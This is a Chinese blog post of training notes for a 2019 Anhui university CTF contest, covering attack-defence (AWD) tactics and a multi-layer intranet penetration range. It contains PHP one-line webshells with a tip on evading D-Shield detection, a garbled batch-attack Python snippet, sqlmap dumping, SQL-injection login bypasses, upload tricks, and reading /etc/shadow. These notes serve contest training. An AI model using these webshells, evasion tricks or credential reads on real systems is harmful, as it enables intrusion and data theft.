2019年安徽省大学生网络攻防赛赛前培训——Day2

AWD(高职组)比赛思路

  • 流量分析虚拟机,下载流量文件进行数据分析(可能无)*
  • flag刷新
  • flag被拿走,该队扣分,攻击者得分
  • 主办方对队伍的服务器进行check,扣分。得分由其他队伍均分
  • 数据库密码
    • 数据库 (database-config.php)
    • /etc/redis/redis.conf
    • tomacat-user.xml
    • webpass.
  • 用户,目录,端口,进程信息(提权)
    (ps,netstat -anptu,top,/etc/issue)
  • 网站后门,web日志(get,),flag日志,history,(备份网站)
  • 备份与恢复(删源码)
    • tar -czf 目录
    • 备份到本地
  • 编写waf
    • 做好数据清洗和日志信息
    • 文件与进程监控
      • 文件监控(python脚本,filecmp,shutil,os)
      • 进程监控
  • 修改服务口令,约束服务外联
  • 同步当前ssh用户主目录
  • 定期清理seesions文件,tmp目录
  • 服务弱口令
  • 主办方后门
  • 确定cms版本号,搜exploit进行利用
  • 一句话木马(限制ip,避免被D盾检测)
  • Linux基础
    • grep -nir “eval” /var/www/html
    • ps -ef |grep httpd
    • echo -e “\oldpasswd\nnewpasswd\nnewpasswd” | passwd
    • ps -u apache -o user,pid
    • contrab -r //删除自动化任务
  • 常用脚本
    • php程序脚本
    • waf加载/卸载程序(过滤)
    • 文件监控
    • 进程监控
    • 批量攻击脚本
    • webshell管理系统
  • mac地址绑定
  • 漏洞(sql+文件上传+文件解析漏洞)
  • 维持权限(提权),加固。
    nc -lvvp 9999
    服务器提权
    cp flag放在网站目录下(contrab 创建任务直接cp flag)
import requests
for i in range():  
    ip = ???    
    try:        
        req = requests.get(url)        
        print(ip,req.text)    
    expect:        
        psss 
eval(_$GET[PASS]) 
requests.get(url+?PASS=system("cat /flag"))
  • 文件包含file_include(没有必要的话,直接过滤)
  • check_login($user直接拼接到Sql查询语句,过滤不严格)
  • 越权
  • 上传文件(严格,验证后缀,上传文件功能删除)
  • extract($_REQUEST); a ( a( a(_post(‘b’)) 一句话木马(代码注入)
  • 逻辑漏洞:admin 111 验证码正确(验证码不刷新不改变)post注入
    sqlmap -r sql.txt --dbs (爆库)

CFS综合靶场(本科组)比赛

  • 网络拓扑
采用内网渗透的方式
攻击机IP:172.24.10.x(255.255.255.0) 与第一层靶机的网卡1处于同一网段
第一层靶机  网卡1:172.24.10.x(255.255.255.0) 
           网卡2:172.24.11.x(255.255.255.0)
第二层靶机  网卡1:172.24.11.x(255.255.255.0)
           网卡2:172.24.12.x(255.255.255.0)
第三层靶机  网卡1:172.24.12.x(255.255.255.0)

攻入第一层靶机后,在第一层靶机上做代理依次访问第二台靶机

攻击思路
  • nmap扫描
    nmap -a -sV ip
  • 扫描后台
    • 御剑
    • dirsearch(python dirsearch.py -u “URL” )
  • 登陆界面尝试sql注入 (万能密码admin’#)
  • 上传webshell
    • 找上传目录(注意扫描出来的后台)
    • 传图片马 1.jpg.php等
    • 测试phpinfo();
    • 一句话木马
<?php phpinfo(); eval($_POST["PASS"]) ;?> 

使用中国菜刀连接

  • 寻找flag 常见flag位置
    • /
    • /etc/passwd
    • /etc/shadow
    • grep “flag” -R /
    • 网站后台
    • http ssh等配置文件
    • crontab
    • 数据库
    • 网站的配置文件如:config.php
    • 桌面 流量包 开机启动项 SAM密码文件 日志文件(windows)
  • 收集提权脚本和代理脚本
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值